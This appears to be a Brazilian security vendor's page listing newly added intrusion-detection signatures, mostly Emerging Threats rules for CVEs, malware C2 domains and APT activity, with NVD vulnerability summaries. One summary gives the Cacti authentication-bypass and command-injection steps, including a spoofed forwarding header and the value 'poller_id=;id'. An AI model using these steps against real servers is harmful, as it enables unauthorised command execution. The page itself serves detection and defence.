Rua Alexandre Dumas, 1711
Edifício Birmann 11, loja 02 térreo
Chácara Santo Antônio
04717-911
São Paulo – SP
Materiais
Receba nossas novidades
Redes Sociais
Menu
Aqui você encontra informações sobre as últimas
assinaturas de ameaças geradas por nossos especialistas.
A buffer over flow in Xiongmai DVR devices NBD80X16S-KL, NBD80X09S-KL, NBD80X08S-KL, NBD80X09RA-KL, AHB80X04R-MH, AHB80X04R-MH-V2, AHB80X04-R-MH-V3, AHB80N16T-GS, AHB80N32F4-LME, and NBD90S0VT-QW allows attackers to cause a Denial of Service (DoS) via a crafted RSTP request.
Novos registros de AppleJeus (Malware recente do Lazarus)
| 2041658 – ET TROJAN Observed DNS Query to AppleJeus Domain (strainservice .com) (emerging-trojan.rules) |
| 2041659 – ET TROJAN Observed DNS Query to AppleJeus Domain (telloo .io) (emerging-trojan.rules) |
| 2041660 – ET TROJAN Observed DNS Query to AppleJeus Domain (wirexpro .com) (emerging-trojan.rules) |
| 2041661 – ET TROJAN Observed DNS Query to AppleJeus Domain (rebelthumb .net) (emerging-trojan.rules) |
| 2041662 – ET TROJAN Observed DNS Query to AppleJeus Domain (oilycargo .com) (emerging-trojan.rules) |
| 2041663 – ET TROJAN Observed DNS Query to AppleJeus Domain (bloxholder .com) (emerging-trojan.rules) |
| 2041664 – ET TROJAN Win32/AppleJeus CnC Checkin (POST) (emerging-trojan.rules) |
AMI MegaRAC Redfish Arbitrary Code Execution
Cacti is an open source platform which provides a robust and extensible operational monitoring and fault management framework for users. In affected versions a command injection vulnerability allows an unauthenticated user to execute arbitrary code on a server running Cacti, if a specific data source was selected for any monitored device. The vulnerability resides in the `remote_agent.php` file. This file can be accessed without authentication. This function retrieves the IP address of the client via `get_client_addr` and resolves this IP address to the corresponding hostname via `gethostbyaddr`. After this, it is verified that an entry within the `poller` table exists, where the hostname corresponds to the resolved hostname. If such an entry was found, the function returns `true` and the client is authorized. This authorization can be bypassed due to the implementation of the `get_client_addr` function. The function is defined in the file `lib/functions.php` and checks serval `$_SERVER` variables to determine the IP address of the client. The variables beginning with `HTTP_` can be arbitrarily set by an attacker. Since there is a default entry in the `poller` table with the hostname of the server running Cacti, an attacker can bypass the authentication e.g. by providing the header `Forwarded-For: <TARGETIP>`. This way the function `get_client_addr` returns the IP address of the server running Cacti. The following call to `gethostbyaddr` will resolve this IP address to the hostname of the server, which will pass the `poller` hostname check because of the default entry. After the authorization of the `remote_agent.php` file is bypassed, an attacker can trigger different actions. One of these actions is called `polldata`. The called function `poll_for_data` retrieves a few request parameters and loads the corresponding `poller_item` entries from the database. If the `action` of a `poller_item` equals `POLLER_ACTION_SCRIPT_PHP`, the function `proc_open` is used to execute a PHP script. The attacker-controlled parameter `$poller_id` is retrieved via the function `get_nfilter_request_var`, which allows arbitrary strings. This variable is later inserted into the string passed to `proc_open`, which leads to a command injection vulnerability. By e.g. providing the `poller_id=;id` the `id` command is executed. In order to reach the vulnerable call, the attacker must provide a `host_id` and `local_data_id`, where the `action` of the corresponding `poller_item` is set to `POLLER_ACTION_SCRIPT_PHP`. Both of these ids (`host_id` and `local_data_id`) can easily be bruteforced. The only requirement is that a `poller_item` with an `POLLER_ACTION_SCRIPT_PHP` action exists. This is very likely on a productive instance because this action is added by some predefined templates like `Device – Uptime` or `Device – Polling Time`. This command injection vulnerability allows an unauthenticated user to execute arbitrary commands if a `poller_item` with the `action` type `POLLER_ACTION_SCRIPT_PHP` (`2`) is configured. The authorization bypass should be prevented by not allowing an attacker to make `get_client_addr` (file `lib/functions.php`) return an arbitrary IP address. This could be done by not honoring the `HTTP_…` `$_SERVER` variables. If these should be kept for compatibility reasons it should at least be prevented to fake the IP address of the server running Cacti. This vulnerability has been addressed in both the 1.2.x and 1.3.x release branches with `1.2.23` being the first release containing the patch.
gl-inet GL-MT300N-V2 Mango v3.212 and GL-AX1800 Flint v3.214 were discovered to contain multiple command injection vulnerabilities via the ping_addr and trace_addr function parameters.
A buffer overrun can be triggered in X.509 certificate verification, specifically in name constraint checking. Note that this occurs after certificate chain signature verification and requires either a CA to have signed the malicious certificate or for the application to continue certificate verification despite failure to construct a path to a trusted issuer. An attacker can craft a malicious email address to overflow four attacker-controlled bytes on the stack. This buffer overflow could result in a crash (causing a denial of service) or potentially remote code execution. Many platforms implement stack overflow protections which would mitigate against the risk of remote code execution. The risk may be further mitigated based on stack layout for any given platform/compiler. Pre-announcements of CVE-2022-3602 described this issue as CRITICAL. Further analysis based on some of the mitigating factors described above have led this to be downgraded to HIGH. Users are still encouraged to upgrade to a new version as soon as possible. In a TLS client, this can be triggered by connecting to a malicious server. In a TLS server, this can be triggered if the server requests client authentication and a malicious client connects. Fixed in OpenSSL 3.0.7 (Affected 3.0.0,3.0.1,3.0.2,3.0.3,3.0.4,3.0.5,3.0.6).
Adições de IPs com má reputação em mais de 200 grupos de portas.
2039129 – ET EXPLOIT ZKBioSecurity SQL Injection Attempt (CVE-2022-36635) (emerging-exploit.rules)
ZKteco ZKBioSecurity V5000 4.1.3 was discovered to contain a SQL injection vulnerability via the component /baseOpLog.do.
Encontrada uma vulnerabilidade de tipo SQl Injection em uma plataforma de segurança fisica (elevadores, controles de acesso etc) conhecida como ZKSecurity Bio v4.1.3
2039141 – ET EXPLOIT Possible Zimbra Arbitrary File Upload (CVE-2022-41352) M1 (emerging-exploit.rules)
2039142 – ET EXPLOIT Possible Zimbra Arbitrary File Upload (CVE-2022-41352) M2 (emerging-exploit.rules)
2039143 – ET EXPLOIT Possible Zimbra Arbitrary File Upload (CVE-2022-41352) M4 (emerging-exploit.rules)
2039144 – ET EXPLOIT Possible Zimbra Arbitrary File Upload (CVE-2022-41352) M3 (emerging-exploit.rules)
2039145 – ET EXPLOIT Possible Zimbra Arbitrary File Upload (CVE-2022-41352) M6 (emerging-exploit.rules)
2039146 – ET EXPLOIT Possible Zimbra Arbitrary File Upload (CVE-2022-41352) M5 (emerging-exploit.rules)
2039147 – ET EXPLOIT Possible Zimbra Arbitrary File Upload (CVE-2022-41352) M7 (emerging-exploit.rules)
2039148 – ET EXPLOIT Possible Zimbra Arbitrary File Upload (CVE-2022-41352) M8 (emerging-exploit.rules)
An issue was discovered in Zimbra Collaboration (ZCS) 8.8.15 and 9.0. An attacker can upload arbitrary files through amavisd via a cpio loophole (extraction to /opt/zimbra/jetty/webapps/zimbra/public) that can lead to incorrect access to any other user accounts. Zimbra recommends pax over cpio. Also, pax is in the prerequisites of Zimbra on Ubuntu; however, pax is no longer part of a default Red Hat installation after RHEL 6 (or CentOS 6). Once pax is installed, amavisd automatically prefers it over cpio.
Uma vulnerabilidade encontrada no Zimbra, onde o atacante poderia subir um arquivo arbitrario com cpioloophole o que levava a acessos a outras contas
2039149 – ET EXPLOIT Possible Zimbra Arbitrary File Upload (CVE-2022-30333) M1 (emerging-exploit.rules)
2039150 – ET EXPLOIT Possible Zimbra Arbitrary File Upload (CVE-2022-30333) M2 (emerging-exploit.rules)
By selecting these links, you will be leaving NIST webspace. We have provided these links to other web sites because they may have information that would be of interest to you. No inferences should be drawn on account of other sites being referenced, or not, from this page. There may be other web sites that are more appropriate for your purpose. NIST does not necessarily endorse the views expressed, or concur with the facts presented on these sites. Further, NIST does not endorse any commercial products that may be mentioned on these sites. Please address comments about this page to nvd@nist.gov.
2039173 – ET WEB_SERVER [Cluster25] FortiOS Auth Bypass Attempt (CVE-2022-40684) (emerging-web_server.rules)
2039419 – ET WEB_SERVER Successful FortiOS Auth Bypass Attempt – SSH Key Upload (CVE-2022-40684) (emerging-web_server.rules)
2039420 – ET WEB_SERVER Successful FortiOS Auth Bypass Attempt – Admin Details Leaked (CVE-2022-40684) (emerging-web_server.rules)
An authentication bypass using an alternate path or channel [CWE-288] in Fortinet FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0 allows an unauthenticated atttacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.
Uma falha de bypass encontrada no sistema da Fortinet (FortiOS versão 7.2)
2039464 – ET EXPLOIT Possible Apache Text4shell RCE Attempt Script Prefix (CVE-2022-42889) (Inbound) (emerging-exploit.rules)
2039465 – ET EXPLOIT Possible Apache Text4shell RCE Attempt Script Prefix (CVE-2022-42889) (Outbound) (emerging-exploit.rules)
2039466 – ET EXPLOIT Possible Apache Text4shell RCE Attempt DNS Prefix (CVE-2022-42889) (Inbound) (emerging-exploit.rules)
2039467 – ET EXPLOIT Possible Apache Text4shell RCE Attempt DNS Prefix (CVE-2022-42889) (Outbound) (emerging-exploit.rules)
2039468 – ET EXPLOIT Possible Apache Text4shell RCE Attempt URL Prefix (CVE-2022-42889) (Inbound) (emerging-exploit.rules)
2039469 – ET EXPLOIT Possible Apache Text4shell RCE Attempt URL Prefix (CVE-2022-42889) (Outbound) (emerging-exploit.rules)
2039470 – ET EXPLOIT Possible Apache Text4shell RCE Attempt URL Prefix (CVE-2022-42889) (Inbound) (emerging-exploit.rules)
2039471 – ET EXPLOIT Possible Apache Text4shell RCE Attempt URL Prefix (CVE-2022-42889) (Outbound) (emerging-exploit.rules)
Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is “${prefix:name}”, where “prefix” is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: – “script” – execute expressions using the JVM script execution engine (javax.script) – “dns” – resolve dns records – “url” – load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolators by default.
2039591 – ET TROJAN Potential Juniper Phar Deserialization RCE Attempt (CVE-2022-22241) (emerging-trojan.rules)
An Improper Input Validation vulnerability in the J-Web component of Juniper Networks Junos OS may allow an unauthenticated attacker to access data without proper authorization. Utilizing a crafted POST request, deserialization may occur which could lead to unauthorized local file access or the ability to execute arbitrary commands. This issue affects Juniper Networks Junos OS: all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S9; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S2; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R2-S2, 21.3R3; 21.4 versions prior to 21.4R1-S2, 21.4R2-S1, 21.4R3; 22.1 versions prior to 22.1R1-S1, 22.1R2.
Uma vulnerabilidade encontrada nos componentes no sistema Junos OS, resultava em um ataque não autenticado usando POST e levava a arquivos locais.
2039592 – ET TROJAN Potential Juniper XPATH Injection Attempt (CVE-2022-22244) (emerging-trojan.rules)
By selecting these links, you will be leaving NIST webspace. We have provided these links to other web sites because they may have information that would be of interest to you. No inferences should be drawn on account of other sites being referenced, or not, from this page. There may be other web sites that are more appropriate for your purpose. NIST does not necessarily endorse the views expressed, or concur with the facts presented on these sites. Further, NIST does not endorse any commercial products that may be mentioned on these sites. Please address comments about this page to nvd@nist.gov.
2039598 – ET TROJAN Potential Juniper Reflected XSS Attempt (CVE-2022-22242) (emerging-trojan.rules)
A Cross-site Scripting (XSS) vulnerability in the J-Web component of Juniper Networks Junos OS allows an unauthenticated attacker to run malicious scripts reflected off of J-Web to the victim’s browser in the context of their session within J-Web. This issue affects Juniper Networks Junos OS all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S4; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R2; 22.1 versions prior to 22.1R2.
Vulnerabilidade de XSS encontrada no Junos OS
2039599 – ET TROJAN Potential Juniper Path Traversal RCE Attempt (CVE-2022-22245) (emerging-trojan.rules)
A Path Traversal vulnerability in the J-Web component of Juniper Networks Junos OS allows an authenticated attacker to upload arbitrary files to the device by bypassing validation checks built into Junos OS. The attacker should not be able to execute the file due to validation checks built into Junos OS. Successful exploitation of this vulnerability could lead to loss of filesystem integrity. This issue affects Juniper Networks Junos OS: all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R3-S9; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S2; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R2-S2, 21.3R3; 21.4 versions prior to 21.4R1-S2, 21.4R2-S1, 21.4R3; 22.1 versions prior to 22.1R1-S1, 22.1R2.
2039600 – ET TROJAN Potential Juniper PHP Local File Inclusion Attempt (CVE-2022-22246) (emerging-trojan.rules)
A PHP Local File Inclusion (LFI) vulnerability in the J-Web component of Juniper Networks Junos OS may allow a low-privileged authenticated attacker to execute an untrusted PHP file. By chaining this vulnerability with other unspecified vulnerabilities, and by circumventing existing attack requirements, successful exploitation could lead to a complete system compromise. This issue affects Juniper Networks Junos OS: all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S6; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S2; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R2-S2, 21.3R3; 21.4 versions prior to 21.4R1-S2, 21.4R2-S1, 21.4R3; 22.1 versions prior to 22.1R1-S1, 22.1R2.
Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming.
Nishang é um framework e uma coleção de scripts e payloads que habilitam o PowerShell para acesso (ferramenta especialmente usada para testes de invasão e red team)
Adicionada novas assinaturas do ET MALWARE TA453/APT35 HYPERSCRAPE no Blockbit UTM e disponibilizado em nosso repositório oficial.
Hyperscrape: Os hackers o executam em suas próprias máquinas para baixar e-mails das caixas de entrada das vítimas usando credenciais adquiridas anteriormente e excluir a atividade do aplicativo.
Trojan:OSX/Shlayer identifies a file that appears to be an update for a popular media player, but when launched will instead run scripts that download other unwanted programs onto the computer.
OSX/SHLAYER é um tipo de trojan que costuma se identificar como um reprodutor de media popular, porém ao ser rodado ele trará uma série de scripts que irão baixar programas indesejados no computador.
Confucius is a cyber espionage group that has primarily targeted military personnel, high-profile personalities, business persons, and government organizations in South Asia since at least 2013. Security researchers have noted similarities between Confucius and Patchwork, particularly in their respective custom malware code and targets.
Confucius é um grupo de cyber espionagem que tem como alvo primário militares, personalidades importantes, organizações governamentais no sul asiático desde 2013. Possuem certa similaridade com o grupo Patchwork.
O VMware Workspace ONE Access, o Identity Manager e o vRealize Automation contêm uma vulnerabilidade de desvio de autenticação que afeta os usuários do domínio local. Um agente mal-intencionado com acesso de rede à interface do usuário pode obter acesso administrativo sem a necessidade de autenticação.
Assinatura gerada pela Blockbit:
A assinatura corresponde a uma landing page do Facebook com capacidade de roubar credenciais de acesso.
Landing Page 2022-07-29 (emerging-current_events.rules)
Assinatura gerada pela Blockbit:
sid: 2037869
ET CURRENT_EVENTS Facebook Credential Theft Landing Page 2022-07-29 (emerging-current_events.rules)
O Grupo Lazarus tem fortes ligações com a Coreia do Norte. A Coreia do Norte se beneficia da realização de operações cibernéticas porque pode apresentar uma ameaça assimétrica com um pequeno grupo de operadores, especialmente para a Coreia do Sul.
Assinatura gerada pela Blockbit:
Este grupo de espionagem cibernética tem como alvo vários diplomatas e economistas de alto nível que têm relações internacionais com a China, usando um conjunto personalizado de ferramentas de ataque. Os ataques geralmente eram feitos por meio de campanha de spear phishing ou ataques de watering hole.
Assinatura gerada pela Blockbit:
Assinaturas geradas pela Blockbit:
Assinaturas geradas pela Blockbit:
O Zimbra Collaboration (também conhecido como ZCS) 8.8.15 e 9.0 possui a funcionalidade mboximport que recebe um arquivo ZIP e extrai arquivos dele. Um usuário autenticado com direitos de administrador tem a capacidade de fazer upload de arquivos arbitrários para o sistema, levando à travessia do diretório.
Assinatura gerada pela Blockbit:
A vulnerabilidade é uma execução remota de código (RCE) crítica (CVSS: 9.8), que afeta o VMware Workspace ONE Access e o VMware Identity Manager, dois produtos de software amplamente utilizados.
Assinaturas geradas pela Blockbit
Assinaturas geradas pela Blockbit
sid:2036731Adobe ColdFusion 11 – LDAP Java Object Deserialization RCE (GET) CVE-2018-15957
sid:2036732
Adobe ColdFusion 11 – LDAP Java Object Deserialization RCE (POST) CVE-2018-15957
Assinatura gerada pela Blockbit
Um ataque de ransomware foi implantado contra um alvo sem nome, usando o dispositivo VoIP da Mitel como ponto de entrada.
Assinatura gerada pela Blockbit
Uma vulnerabilidade de injeção de comando na interface da web do firmware Zyxel NWA-1100-NH pode permitir que um invasor execute comandos arbitrários do sistema operacional do dispositivo.
Assinatura gerada pela Blockbit
Considerada de alta gravidade, a vulnerabilidade em questão afeta a Ferramenta de Diagnóstico da Microsoft (MSDT), que pode ser explorada por cibercriminosos para a execução de códigos maliciosos remotamente.
Assinaturas geradas pela Blockbit
Quando arquivos são carregados no dotCMS por meio de um API de conteúdo, o dotCMS grava o arquivo em um diretório temporário. No caso desta vulnerabilidade, o dotCMS não limpa o nome do arquivo passado por meio do cabeçalho de solicitação de várias partes e, portanto, não limpa o nome do arquivo temporário.
Assinaturas geradas pela Blockbit
sid:2036457
dotCMS Arbitrary File Upload Attempt M1
Essa vulnerabilidade afeta firewalls Zyxel que suportam Zero Touch Provisioning (ZTP), que inclui as séries ATP, VPN e USG FLEX (incluindo USG20-VPN e USG20W-VPN). A vulnerabilidade, identificada como CVE-2022-30525, permite que um invasor remoto e não autenticado consiga a execução de código arbitrário como o usuário no dispositivo afetado.
Assinatura gerada pela Blockbit
sid:2036596
[Rapid7] Zyxel ZTP setWanPortSt mtu Parameter Exploit Attempt (CVE 2022-30525)
Recentemente, o Apache emitiu um aviso de risco para a vulnerabilidade de execução remota de código do Apache CouchDB, o número da vulnerabilidade é CVE-2022-24706 e a gravidade é crítica.
No Apache CouchDB anterior à versão 3.2.2, um invasor pode acessar uma instalação padrão inadequadamente protegida sem autenticação e obter privilégios de administrador.
Assinatura gerada pela Blockbit
O Telesquare SDT-CW3B1 1.1.0 é afetado por uma vulnerabilidade de injeção de comando do sistema operacional que permite que um invasor remoto execute comandos do sistema operacional sem qualquer autenticação.
Assinatura gerada pela Blockbit
Considerando o impacto potencialmente extenso dessa vulnerabilidade, os usuários são aconselhados a ficar atentos e tomar as medidas necessárias para se proteger.
Assinaturas geradas pela Blockbit
Uma vulnerabilidade de desvio de autenticação no Portal do Usuário e no Webadmin permite que um invasor remoto execute código no Sophos Firewall na versão v18.5 MR3 e em versões anteriores.
Assinaturas geradas pela Blockbit
A vulnerabilidade é uma execução remota de código (RCE) crítica (CVSS: 9.8), que afeta o VMware Workspace ONE Access e o VMware Identity Manager, dois produtos de software amplamente utilizados.
Assinaturas geradas pela Blockbit
Uma vulnerabilidade F5 BIG-IP recentemente divulgada foi usada em ataques destrutivos, tentando apagar o sistema de arquivos de um dispositivo e tornar o servidor inutilizável.
Assinaturas geradas pela Blockbit
Um problema nginx Zero-Day RCE foi identificado na implementação do nginx LDAP-auth daemon, que vazou brevemente.
Assinatura gerada pela Blockbit
Foi descoberto que o Redis, um banco de dados de chave-valor persistente, devido a um problema de empacotamento, é propenso a escapar do sandbox lua (específico do Debian), o que poderia resultar na execução remota de código.
Assinaturas geradas pela Blockbit
Trata-se de uma vulnerabilidade de desvio de assinatura digital em Java que se deve à má implementação do Algoritmo de Assinatura Digital de Curva Elíptica em Java. Essa vulnerabilidade de desvio de assinatura faz com que o Java aceite uma assinatura em branco como uma assinatura válida.
Assinaturas geradas pela Blockbit
O Kwampirs é um trojan de acesso remoto capaz de obter acesso a máquinas e redes.
Assinatura gerada pela Blockbit
Sid 2023595 TROJAN Trojan.Kwampirs Outbound GET request
O Trickbot surgiu como um trojan bancário e se tornou um malware poderoso com capacidade para roubar dados, lançar ataques de ransomware e destruir arquivos.
Assinaturas geradas pela Blockbit
Sid 2023727 TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (TrickBot CnC)
Sid 2033659 TROJAN Win32/TrickBot CnC Initial Checkin M2
O Loki Locker se trata de uma ameaça capaz de infectar sistemas, criptografar arquivos armazenados e extorquir dinheiro de suas vítimas.
Assinatura gerada pela Blockbit
Sid 2035510 MALWARE Loki Locker Ransomware User-Agent
O DarkHotel é uma campanha de espionagem que utiliza certificados falsos na rede Wi-Fi para ludibriar executivos hospedados em hotéis de luxo.
Assinatura gerada pela Blockbit
Sid 2021609 TROJAN Possible DarkHotel Landing M1
O CaddyWiper é um software malicioso projetado para limpar os dados armazenados em dispositivos infectados. Embora também seja do tipo wiper, o CaddyWiper não possui semelhanças significativas com o HermeticWiper ou o IsaacWiper.
Assinatura gerada pela Blockbit
Sid 59268 MALWARE-OTHER Win.Trojan.CaddyWiper download attempt Rule
Grupo de cibercriminosos responsáveis por ataques APT (Advanced Persistent Threat).
Assinaturas geradas pela Blockbit
Sid 2035551 TROJAN Suspected Mustang Panda APT Related Activity (GET)
Sid 2035552 TROJAN Suspected Mustang Panda APT Related Activity (GET)
O Scarab se trata de um tipo de ransomware que se infiltra no sistema e para roubar vários dados.
Assinatura gerada pela Blockbit
Sid 2035557 TROJAN Scarab APT Related Domain in DNS Lookup
Verblecon é uma ameaça que funciona como um carregador, lançando outros conteúdos maliciosos nos dispositivos infectados por ele.
Assinaturas geradas pela Blockbit
Sid 2035659 TROJAN Trojan.Verblecon User Agent Observed
Sid 2035660 TROJAN Trojan.Verblecon Related Domain in DNS Lookup (gaymers .ax)
Sid 2035661 TROJAN Observed Trojan.Verblecon Related Domain (gaymers .ax in TLS SNI)
Sid 2035662 TROJAN Trojan.Verblecon Related Domain in DNS Lookup (jonathanhardwick .me)
Sid 2035663 TROJAN Observed Trojan.Verblecon Related Domain (jonathanhardwick .me in TLS SNI)
Sid 2035664 TROJAN Trojan.Verblecon Related Domain in DNS Lookup (.verble .rocks)
Sid 2035665 TROJAN Observed Trojan.Verblecon Related Domain (.verble .rocks in TLS SNI)
Sid 2035666 TROJAN Trojan.Verblecon Related Domain in DNS Lookup (verble .software)
Sid 2035667 TROJAN Observed Trojan.Verblecon Related Domain (verble .software in TLS SNI)
O CrimsonRAT é um trojan de acesso remoto, que foi encontrado em e-mails de spearphishing com documentos mal-intencionados do Microsoft Office.
Assinaturas geradas pela Blockbit
Sid 2035598 TROJAN Win32/CrimsonRAT Variant Sending Command (inbound)
Sid 2035599 TROJAN Win32/CrimsonRAT Variant Sending Command M2 (inbound)
Sid 2035600 TROJAN Win32/CrimsonRAT Variant Sending System Information (outbound)
Considerado o maior zero day da última década, o Log4Shell é uma vulnerabilidade detectada na biblioteca de código aberto Apache Log4j.
Assinaturas geradas pela Blockbit
DNS Query for Observed CVE-2021-44228 Security Scanner Domain (log4shell .huntress .com)
VMWare vSphere log4shell exploit attempt
Sid 2034820
Sid 58811
Sid 58812
Sid 58813
CVE-2021-44228
CVE-2021-44832
CVE-2021-45046
CVE-2021-45105
Considerado como o novo Log4j, o Spring4Shell é uma vulnerabilidade que afeta o SpringCore, uma estrutura amplamente usada em aplicativos Java.
Assinaturas geradas pela Blockbit
Sid 2035670 Possible Spring Cloud Connector RCE Inbound (CVE-2022-22963)
Sid 2035674 Possible SpringCore RCE/Spring4Shell Stage 1 Pattern Set Inbound (Unassigned)
Sid 2035675 Possible SpringCore RCE/Spring4Shell Stage 2 Suffix Set Inbound (Unassigned)
Sid 2035676 Possible SpringCore RCE/Spring4Shell Stage 3 Directory Set Inbound (Unassigned)
Sid 2035677 Possible SpringCore RCE/Spring4Shell Stage 4 Prefix Set Inbound (Unassigned)
Sid 2035678 Possible SpringCore RCE/Spring4Shell Inbound (Unassigned)
Rua Alexandre Dumas, 1711
Edifício Birmann 11, loja 02 térreo
Chácara Santo Antônio
04717-911
São Paulo – SP
© Blockbit 2022 – Todos os direitos reservados.